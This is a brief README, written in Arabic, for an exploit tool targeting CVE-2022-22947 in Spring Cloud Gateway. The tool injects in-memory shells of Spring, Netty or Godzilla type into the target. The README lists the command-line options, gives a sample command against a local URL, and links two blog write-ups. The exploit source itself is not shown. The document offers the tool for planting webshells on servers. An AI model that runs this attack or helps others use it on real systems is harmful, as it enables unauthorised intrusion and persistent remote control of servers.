
استغلال لـ CVE-2022-22947 يتيح حقن شيل في الذاكرة في Spring Gateway مع دعم أنواع الحمولات Spring و Netty و Godzilla عبر CLI.
يدعم حقن ثلاثة أنواع من القشرة الذاكرة
Usage: usage -t <type> -u <url>
Options:
-h, --help show this help message and exit
-t TYPE switch one : spring, netty, godzilla
-u URL url
على سبيل المثال، حقن قشرة Godzilla
python3 -t godzilla -u http://127.0.0.1

https://blog.wanghw.cn/tech-share/cve-2022-22947-inject-godzilla-memshell.html https://mp.weixin.qq.com/s/S15erJhHQ4WCVfF0XxDYMg